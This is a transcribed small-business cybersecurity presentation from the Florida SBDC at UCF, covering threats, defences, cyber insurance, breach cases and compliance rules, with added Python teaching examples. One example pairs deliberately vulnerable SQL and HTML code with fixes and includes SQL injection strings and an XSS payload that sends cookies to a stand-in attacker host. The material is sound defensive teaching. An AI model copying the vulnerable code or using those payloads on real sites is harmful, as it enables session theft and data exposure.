Florida SBDC at UCF's Cybersecurity for Small Businesses: … · 2019-06-15 · Helping Businesses...
Helping Businesses Grow & Succeed
Florida SBDC at UCF's Cybersecurity for Small Businesses: Protecting Your Digital Assets in 2018
BYTE-SIZE: The Small Business Cybersecurity Program of the FSBDC Network
NOTE: These materials are intended to provide information to help small businesses consider key cybersecurity concepts, to share ideas for reducing cyber risk, and to identify helpful resources from multiple public and private organizations. However, no single technology or program can eliminate all cyber risk or guarantee protection from constantly evolving digital attacks. It is always best to consult IT security and legal professionals to understand your responsibilities and to manage the specific cyber risks associated with your business.
This presentation is a companion to the publication entitled The Florida SBDC
Network Byte-Size Program: Cybersecurity Basics for Small Business.
For more information, visit floridasbdc.org/cybersecurity
Lee V. Mangold (CISSP, CEH, GLSC, ITIL...)
Co-Founder & CEO, GoldSky Security
Co-Founder & Vice President, Florida Cyber Alliance
President, Information Systems Security Association (CFL Chapter)
Board Director, Security BSides Orlando
Adjunct Professor, University of Central Florida
CYBERSECURITY BASICS
Section 1
Trends (2009-2016)
Who are the attackers?
• Organized Crime Organizations
 – Large syndicates of attackers
 – Hierarchical organizations (Mafia-style)
• State-Sponsored Attackers
 – Government organizations
 – Russia, China, Iran, North Korea, etc.
• Script Kiddies
 – Use downloaded tools and scripts
 – Motivated by fame
• Other Professionals
 – Usually experimenting, learning, or shaming
• Hacktivists
 – All of the above
 – Motivated by a social cause
Top Threats & Targets
• Top Threats
 – Malware, specifically ransomware
 – Social engineering: phishing emails, extortion attempts
 – 3rd-party data theft: stolen credentials, 3rd-party breaches
• Top Targets
 – Medical industry: compromising PHI, potentially more...
 – Legal industry: compromising PII and PHI
 – Financial & administrative services: compromising PII; fraud and monetary theft
 – Retail: monetary theft (payment card data, PCI)
Three Foundational Cybersecurity Principles
• What: Know what your critical data/assets are
• Where: Know where your critical data/assets are
• How: Know how they are protected
CLOUD!! (IaaS / PaaS / SaaS)
Types of Attacks
MALWARE
• Malicious software
– Steal credentials or other information
– Steal money
– Ransomware
– Botnets
– Sabotage
– Denial of service
PHISHING
• Email designed to lure you into doing something ill-advised
 – Execute an attachment
 – Click on a link
 – Unwittingly give away sensitive information
• Some are really good at exploiting human gullibility
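The "click on a link" lure usually depends on the visible link text and the real link target disagreeing. The script below is an added example, not part of the original presentation: it parses an HTML e-mail body and reports links whose displayed domain differs from the href's domain, and links that lead to a bare IP address. The sample message, its domains and addresses are constructed for the example, and the "registrable domain" helper assumes single-label public suffixes (it does not handle co.uk-style suffixes).

```python
"""Added example: flag the link tricks a phishing e-mail relies on.
Parses an HTML e-mail body and reports links whose visible text shows one
domain while the href points somewhere else, plus links to a bare IP.
The sample message below is constructed for this example; the domains and
addresses in it are not real."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Visible link text that "looks like" a URL or domain, e.g. www.paypal.com/signin
URL_LIKE = re.compile(r"^(?:https?://)?[\w.-]+\.[a-z]{2,}(?:/\S*)?$", re.I)
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(s):
    """Hostname of a URL or bare domain ('' if it has none)."""
    s = s.strip()
    if "://" not in s:
        s = "http://" + s
    return (urlparse(s).hostname or "").lower()


def registrable(host):
    """Last two labels: 'paypal.com.evil.example' -> 'evil.example'.
    Assumption: two-label public suffixes (co.uk) are out of scope here."""
    parts = host.strip(".").split(".")
    return ".".join(parts[-2:])


def find_suspicious_links(html_body):
    """Return a list of (reason, visible_text, href) for links worth a second look."""
    collector = _LinkCollector()
    collector.feed(html_body)
    findings = []
    for href, text in collector.links:
        href_host = host_of(href)
        if IPV4.match(href_host):
            findings.append(("raw IP address in href", text, href))
        if URL_LIKE.match(text):
            # The text shows one site; does the link really go there?
            if registrable(host_of(text)) != registrable(href_host):
                findings.append(("display text and href point to different domains", text, href))
    return findings


# Constructed sample: a fake "account locked" notice with two tricks and one honest link.
SAMPLE_EMAIL = """
<p>Your account has been locked. Sign in at
<a href="http://paypal.com.security-check.example/login">https://www.paypal.com/signin</a>
within 24 hours.</p>
<p>Or <a href="http://203.0.113.5/reset">reset your password</a> here.</p>
<p>Questions? Visit our <a href="https://www.paypal.com/help">help center</a>.</p>
"""

if __name__ == "__main__":
    for reason, text, href in find_suspicious_links(SAMPLE_EMAIL):
        print(f"[{reason}] text={text!r} href={href!r}")
```

Run against the constructed message, the first link is flagged because the text shows paypal.com while the href lands on security-check.example, the second because it goes to a raw address, and the honest help-center link passes. The same check is what a mail gateway or a user-training tool applies before a user ever hovers over the link.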
INTERNET OF THINGS (IoT)
• Increasingly, connected devices are being targeted
 – Eavesdropping
 – Stealing data
 – Botnet agents
 – DDoS attacks
APPLICATION ATTACKS
• Maliciously manipulate application software
 – Steal data from the database server (e.g., SQL injection)
 – Run attack scripts on other users' PCs (e.g., cross-site scripting)
 – Steal user credentials
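The first two bullets are the classic injection pair. The code below is an added example written for this page, not code from the presentation: each attack is shown as the vulnerable function beside its fixed version, using an in-memory SQLite table and attack strings that are constructed for the example. Names such as `find_user_vulnerable` and the sample users are assumptions made here.

```python
"""Added example: the two application attacks named above, each shown as the
vulnerable code beside its fix. The in-memory SQLite database, the user rows
and the attack strings are constructed for this example."""
import html
import sqlite3


def make_db():
    """Constructed sample data: a tiny users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, email, role) VALUES (?, ?, ?)",
        [("alice", "alice@example.com", "admin"), ("bob", "bob@example.com", "staff")],
    )
    return conn


# --- "Steal data from the database server": SQL injection -------------------

def find_user_vulnerable(conn, username):
    """VULNERABLE: the user-supplied value is pasted into the SQL text, so
    quote characters in it change the meaning of the query."""
    query = "SELECT username, email FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchall()


def find_user_safe(conn, username):
    """FIXED: a bound parameter is always data, never SQL, whatever it contains."""
    return conn.execute(
        "SELECT username, email FROM users WHERE username = ?", (username,)
    ).fetchall()


# --- "Run attack scripts on other users' PCs": cross-site scripting --------

def render_comment_vulnerable(comment):
    """VULNERABLE: untrusted text is placed straight into the page markup."""
    return "<div class=\"comment\">" + comment + "</div>"


def render_comment_safe(comment):
    """FIXED: HTML-escape before interpolating, so <script> becomes text, not a tag."""
    return "<div class=\"comment\">" + html.escape(comment, quote=True) + "</div>"


# Constructed attack inputs.
SQLI_PAYLOAD = "x' OR '1'='1"                                   # makes the WHERE clause always true
UNION_PAYLOAD = "' UNION SELECT username, role FROM users --"   # pulls a different column out
XSS_PAYLOAD = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", find_user_vulnerable(db, SQLI_PAYLOAD))   # every row comes back
    print("safe:      ", find_user_safe(db, SQLI_PAYLOAD))         # no such user: []
    print("vulnerable:", find_user_vulnerable(db, UNION_PAYLOAD))  # roles leak via UNION
    print(render_comment_vulnerable(XSS_PAYLOAD))                  # script tag reaches the browser
    print(render_comment_safe(XSS_PAYLOAD))                        # rendered as harmless text
```

The fix in both cases is the same idea: keep data and code apart. Bound parameters stop the database from parsing user input as SQL, and output escaping stops the browser from parsing user input as HTML; the third bullet (credential theft) is usually the payload delivered through one of these two holes.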
Remediation Activities
Employee Education
• Technology is great, but your most important assets are your employees
 – First line of defense
 – Train them on the tools you use
 – Encourage them to report strange computer activity
Passwords & MFA
• Use Strong Passwords or Passphrases
• NEVER share your passwords
• Don’t re-use passwords
• Enable Multi-Factor Authentication where possible!
PROTECTIONS
• Policies and policy management
• Software updates
• Configurations
• Security products
• Application software controls
DETECTION MEASURES
• Event monitoring
• Intrusion detection and prevention systems
• Threat monitoring
• User reports
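"Event monitoring" is abstract until you see a rule run over real-looking log lines. The following is an added example, not part of the original presentation: a few dozen lines of detection logic over constructed sshd-style authentication records that raise the three alerts a small shop most wants from its logs: a brute-force run from one address, a password spray (one address trying many usernames), and a successful login right after a burst of failures. The log lines, host name, user names and addresses are made up for the example, and the thresholds are assumptions to tune for your own environment.

```python
"""Added example: the "event monitoring" item made concrete. Detection logic
run over constructed sshd-style authentication log lines, raising alerts for a
brute-force run, a password spray, and a success that follows a burst of
failures. Log lines, hosts and addresses are made up for this example."""
import re
from collections import defaultdict
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
)


def parse_events(lines, year=2018):
    """Yield (timestamp, accepted, user, ip) for auth lines; other lines are ignored.
    Syslog timestamps carry no year, so one is supplied (assumption for the sample)."""
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["result"] == "Accepted", m["user"], m["ip"]


def detect(lines, fail_threshold=5, window_seconds=60, spray_users=3):
    """Return a list of (alert, ip, detail) tuples, one alert per kind per address."""
    recent_failures = defaultdict(list)  # ip -> [(ts, user)] inside the sliding window
    alerts, seen = [], set()

    def raise_once(kind, ip, detail):
        if (kind, ip) not in seen:
            seen.add((kind, ip))
            alerts.append((kind, ip, detail))

    for ts, accepted, user, ip in parse_events(lines):
        # Drop failures that have aged out of the window before judging this event.
        recent_failures[ip] = [(t, u) for t, u in recent_failures[ip]
                               if (ts - t).total_seconds() <= window_seconds]
        if accepted:
            if len(recent_failures[ip]) >= fail_threshold:
                raise_once("success-after-failures", ip, user)
            continue
        recent_failures[ip].append((ts, user))
        if len(recent_failures[ip]) >= fail_threshold:
            raise_once("brute-force", ip, len(recent_failures[ip]))
        distinct_users = {u for _, u in recent_failures[ip]}
        if len(distinct_users) >= spray_users:
            raise_once("password-spray", ip, sorted(distinct_users))
    return alerts


# Constructed sample log in the syslog format sshd writes.
SAMPLE_LOG = """\
Mar  3 10:01:02 web1 sshd[2201]: Failed password for root from 198.51.100.7 port 51022 ssh2
Mar  3 10:01:05 web1 sshd[2203]: Failed password for root from 198.51.100.7 port 51024 ssh2
Mar  3 10:01:09 web1 sshd[2205]: Failed password for root from 198.51.100.7 port 51026 ssh2
Mar  3 10:01:14 web1 sshd[2207]: Failed password for root from 198.51.100.7 port 51028 ssh2
Mar  3 10:01:20 web1 sshd[2209]: Failed password for root from 198.51.100.7 port 51030 ssh2
Mar  3 10:01:25 web1 sshd[2211]: Accepted password for root from 198.51.100.7 port 51032 ssh2
Mar  3 10:01:30 web1 sshd[2211]: Connection closed by 198.51.100.7 port 51032
Mar  3 10:02:00 web1 sshd[2301]: Failed password for invalid user admin from 203.0.113.9 port 40001 ssh2
Mar  3 10:02:03 web1 sshd[2303]: Failed password for alice from 203.0.113.9 port 40002 ssh2
Mar  3 10:02:06 web1 sshd[2305]: Failed password for bob from 203.0.113.9 port 40003 ssh2
Mar  3 10:02:09 web1 sshd[2307]: Failed password for carol from 203.0.113.9 port 40004 ssh2
Mar  3 10:03:00 web1 sshd[2401]: Failed password for dave from 192.0.2.4 port 50010 ssh2
Mar  3 10:03:10 web1 sshd[2403]: Failed password for dave from 192.0.2.4 port 50011 ssh2
Mar  3 10:03:20 web1 sshd[2405]: Accepted password for dave from 192.0.2.4 port 50012 ssh2
""".splitlines()

if __name__ == "__main__":
    for kind, ip, detail in detect(SAMPLE_LOG):
        print(f"ALERT {kind:<24} {ip:<14} {detail}")
```

On the sample the first address trips the brute-force rule on its fifth failure and then the success-after-failures rule when root logs in; the second address never reaches five failures but is caught by the spray rule on its third distinct username; the third address (two typos, then success) produces nothing, which is the false-positive case the threshold exists for. The "user reports" bullet is the same signal arriving by a different channel.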
RESPONSES
• Incident response
 – Advocates for the business
 – Reduces the losses
 – Gets you back in business as quickly as possible
 – Supports investigations
 – Decision support during the incident
 – Crisis communications
INSURANCE
• Is cybersecurity insurance right for you?
 – It depends
 – Policies exist
 – Read the fine print and comply with their requirements
 – Answer their questions candidly
 – Understand what is and is not covered
INSURANCE 101
Key questions:
• Bundled vs. stand-alone?
• What are the policy exclusions?
• How much coverage should I purchase?
• Who is the breach response firm?
Bundled
• Bundled cyber policies often offer limited coverage, not broad protection
• Have gaps and more exclusions
• Usually are an endorsement to other liability policies
• Can result in greater exposure
Electronic Data Processing (EDP)
• EDP policies are not cyber coverage
• They usually cover:
 – Data processing equipment
 – Hardware replacement
 – Property coverage
Stand-Alone
• Stand-alone cyber policies offer the most protection
• Normally cover:
 – Third-party liability
 – Breach response
 – Notification
 – Restoration
 – Business interruption
 – Reputation risk
Stop-Loss (DIC, Difference in Conditions)
• DIC plans are for larger organizations with greater risk profiles
• They provide:
 – A catastrophic backstop
 – Coverage for gaps
 – Large losses once underlying coverage is exhausted
Slide scale, left to right from Bundled to Stop-Loss: Danger Zone → Safe(r) Zone
CASE STUDIES IN CYBERSECURITY
Section 2
Breach Case Studies
• Insurance Company
 – COO's email account credentials phished
 – Account data stolen from email & storage
 – Data exfiltrated to unknown destinations in Russia
 – Had to notify 3,600+ individuals, pay for credit monitoring, etc.
• Healthcare Practice
 – Hard drive stolen during A/C maintenance
 – Owners extorted, police involved
 – Had to notify 37,000+ individuals
• CPA & Patent Firm
 – User sent a fake DocuSign link, logged in, downloaded malware
 – Forwarded the email to colleagues
 – Data exfiltrated to unknown destinations in Russia
Breach Case Studies
• TerraCom and YourTel America (2014)
 – Failed to protect PII of customers
 – 300,000 identities at risk
 – Settled with FCC for $3.5M
• Verizon (2017)
 – Failed to protect PII of customers
 – 3rd-party IT contractor left data unprotected in AWS (a publicly accessible S3 storage bucket)
• Undisclosed Carrier
 – Hackers gained unauthorized access to SIP trunks
 – Hundreds of thousands of dollars in fraudulent charges billed to customers
 – Company had no idea how to track or prevent the attacks
Case Study: Mossack Fonseca
• WordPress website running outdated plugins: Revolution Slider, WP-SMTP and ALO EasyMail
 – Plugins exploited → email passwords recovered
 – Email passwords used to log in to the email server → get mail!
• Drupal web portal (https://Portal.Mossfon.com)
 – Outdated; several critical vulnerabilities
 – Exploited → get data!
Misconfiguration
Configuration Management
– Are all your systems provisioned to a baseline standard?
– Are all your systems audited REGULARLY?
– Could you audit your systems if you had to?
– Who has access to what data and how is it protected?
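One audit that answers the "provisioned to a baseline?" and "audited regularly?" questions for the kind of site in the Mossack Fonseca case is a plugin version check. The script below is an added example written for this page, not the presenter's material: it reads the standard header block every WordPress plugin carries, compares each installed version against a baseline of minimum approved versions, and flags anything outdated or not on the approved list. The plugin sources, the installed versions and the baseline minimums are all constructed for the example; the minimums are not real fixed-in versions for those plugins.

```python
"""Added example: a baseline audit of installed WordPress plugins. Reads the
plugin header comment, compares the version to a minimum-approved baseline,
and flags outdated or unapproved plugins. Plugin sources, versions and the
baseline numbers are constructed for this example (not real fixed-in versions)."""
import re

VERSION_RE = re.compile(r"^\s*\*?\s*Version:\s*(\S+)", re.M)
NAME_RE = re.compile(r"^\s*\*?\s*Plugin Name:\s*(.+?)\s*$", re.M)


def parse_version(version: str) -> tuple:
    """'4.1.4' -> (4, 1, 4); tuples compare label by label, so 1.10 > 1.9."""
    return tuple(int(x) for x in re.findall(r"\d+", version))


def read_plugin_header(php_source: str) -> dict:
    """Pull Plugin Name and Version out of the WordPress header comment."""
    name = NAME_RE.search(php_source)
    version = VERSION_RE.search(php_source)
    return {"name": name.group(1) if name else None,
            "version": version.group(1) if version else None}


def audit_plugins(installed: dict, baseline: dict) -> list:
    """installed: {slug: php_source}; baseline: {slug: minimum_version}.
    Returns (slug, installed_version, required_version, status) per plugin."""
    report = []
    for slug, source in sorted(installed.items()):
        header = read_plugin_header(source)
        have = header["version"]
        need = baseline.get(slug)
        if need is None:
            status = "NOT IN BASELINE"          # unapproved software on the server
        elif have is None:
            status = "UNKNOWN VERSION"          # header missing: cannot be audited
        elif parse_version(have) < parse_version(need):
            status = "OUTDATED"
        else:
            status = "OK"
        report.append((slug, have, need, status))
    return report


# Constructed plugin sources, as found in wp-content/plugins/<slug>/<slug>.php.
INSTALLED = {
    "revslider": "<?php\n/**\n * Plugin Name: Slider Revolution\n * Version: 4.1.4\n */\n",
    "wp-smtp": "<?php\n/*\nPlugin Name: WP SMTP\nVersion: 1.1.2\n*/\n",
    "alo-easymail": "<?php\n/**\n * Plugin Name: ALO EasyMail Newsletter\n * Version: 2.8.1\n */\n",
    "hello-dolly": "<?php\n/**\n * Plugin Name: Hello Dolly\n * Version: 1.6\n */\n",
}

# Hypothetical baseline: minimum versions this business has approved.
BASELINE_MIN_VERSION = {
    "revslider": "4.2.0",
    "wp-smtp": "1.1.0",
    "alo-easymail": "2.9.0",
}

if __name__ == "__main__":
    for slug, have, need, status in audit_plugins(INSTALLED, BASELINE_MIN_VERSION):
        print(f"{slug:<14} installed={have!s:<8} minimum={need!s:<8} {status}")
```

In practice the `installed` dictionary would be filled by walking `wp-content/plugins` on each site, and the baseline would be kept in version control and raised every time a plugin ships a security fix; the audit is then a scheduled job whose output is the answer to "could you audit your systems if you had to?"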
3rd Party Problems
• How do you know your 3rd parties are secure?
• What data do you share with them? Do you know?
• How often have you (or can you) audited 3rd parties?
• Have THEY been breached already?
Mismanagement
• Have you formed a security team or a formal security effort?
• Do you have procedures in place to help prevent breaches?
• What do you do when you HAVE a breach? Would you know?
• Are you practicing risk management in IT and Security?
Seek out best practices!
1. Begin practicing security risk management
2. Work across IT (and all domains) to identify the "what, where, how"
3. Establish baseline security standards
4. Have a plan and seek help where you need it!
CYBERSECURITY COMPLIANCE (AND RISK MANAGEMENT)
Section 3
Cybersecurity Management IS Risk Management
NIST Cybersecurity Framework (not a step-by-step process)
Cyber Risk Management Objectives
• What are my BIGGEST areas of risk?
• What are my potential mitigation strategies?
• What is the cost-benefit of implementing various mitigation strategies?
• What is the cost of doing nothing?
NIST 800-30 – Security Risk Assessment
Security vs. Compliance
Security: protecting what's important
• Confidentiality
• Data integrity
• Availability
Compliance: following the rules
• NIST SP 800-171
• HIPAA
• FIPA and other PII regulations
• PCI DSS
• GLBA, etc.
Three Foundational Cybersecurity Principles
• What: Know what your critical data/assets are
• Where: Know where your critical data/assets are
• How: Know how they are protected
Legal Frameworks (Federal)
• Government Contractors – NIST SP 800-171 compliance (and more...)
• Healthcare – Health Insurance Portability and Accountability Act (HIPAA)
• Financial Institutions – Gramm-Leach-Bliley Act (GLBA)
• Credit Unions – Various FFIEC / NCUA regulations
• Federal Agencies – Federal Information Security Management Act (FISMA)
• Public Companies – Sarbanes-Oxley Act (SOX, Sections 302 & 404)
• International – General Data Protection Regulation (GDPR); EU-U.S. Privacy Shield
Florida Information Protection Act (FIPA)
• Each covered entity shall take reasonable measures to protect and secure data in electronic form containing personal information.
• A covered entity shall provide notice to the department of any breach of security affecting 500 or more individuals in this state.
What is PII?
• First & last name and one of:
 – SSN
 – Financial account number
 – Government ID number
 – Health information or insurance ID
• Username or email address, in combination with a password or security questions
 – Encrypted passwords are not considered PII! (FIPA excludes data that is encrypted or otherwise rendered unusable.)
Other States
• 48 states with data breach and/or data privacy laws
 – Excluded Alabama and South Dakota at the time; both enacted breach notification laws in 2018, so all 50 states now have one
• District of Columbia
• Puerto Rico
• US Virgin Islands
• Guam
NIST SP 800-171 Compliance
• Describes information protection requirements for:
– Non-Federal Organizations holding Controlled Unclassified Information (CUI)
– 22 Categories of CUI Data
What is CUI? 22 Categories of CUI
• Agriculture
• Controlled Technical Info
• Critical Infrastructure
• Emergency Management
• Export Control Research
• Financial Data
• Geodetic Information
• Immigration
• Information Systems Vulns
• Intelligence Data or Records
• International Agreements
• Compulsory Tax Information
• Law Enforcement Data
• Legal Data
• Natural and Cultural Resources
• NATO-Related Data
• Nuclear Data
• Patent Information
• Privacy Information
• Procurement and Acquisition
• Proprietary Business Data
• SAFETY Act Information
• Statistical/Census Data
• Some Transportation Data
Controlled Technical Info
• Research and engineering data
• Engineering drawings and associated lists
• Specifications, standards, process sheets
• Manuals
• Technical reports
• Technical orders
• Data sets
• Studies and analyses and related information
• Computer software executable code and source code
• etc.
NIST SP 800-171 Requirements
• 14 Families of Controls
 – Access Control
 – Awareness and Training
 – Audit and Accountability
 – Configuration Management
 – Identification and Authentication
 – Incident Response
 – Maintenance
 – Media Protection
 – Personnel Security
 – Physical Protection
 – Risk Assessment
 – Security Assessment
 – System and Communications Protection
 – System and Information Integrity
Control Example
From NIST SP 800-53
Next Steps...
• Download & read NIST SP 800-171
 – https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-171.pdf
• Plan for implementation of controls
 – Assess for applicability and impact
• Implement controls like a project
• Continually assess your security!
CYBERSECURITY RESOURCES
Section 4
RESOURCES AND PLANNING
Information:
• Florida Small Business Development Center Network: http://floridasbdc.org/cybersecurity
• US Chamber of Commerce: https://www.uschamber.com/cyber
Threat Reporting & Alerts:
• FBI IC3: https://www.ic3.gov
• Secure Florida: http://secureflorida.org
Note: Additional resources may be found in the Florida SBDC Network's Byte-Size program publication: Cybersecurity Basics For Small Business
Planning Materials:
• US Small Business Administration (SBA): https://www.sba.gov/business-guide/manage/prepareemergencies-disaster-assistance
• SBA Learning Center: https://www.sba.gov/tools/sba-learning-center/training/cybersecurity-small-businesses
• National Institute of Standards and Technology (NIST), NISTIR 7621 Rev. 1, Small Business Information Security: The Fundamentals: http://nvlpubs.nist.gov/nistpubs/ir/2016/NIST.IR.7621r1.pdf
RELATED TIPS
• Get to know your law enforcement
 – Who are they, what resources do they have?
 – Meet them in person (prior to needing to)
 – Consider FBI's InfraGard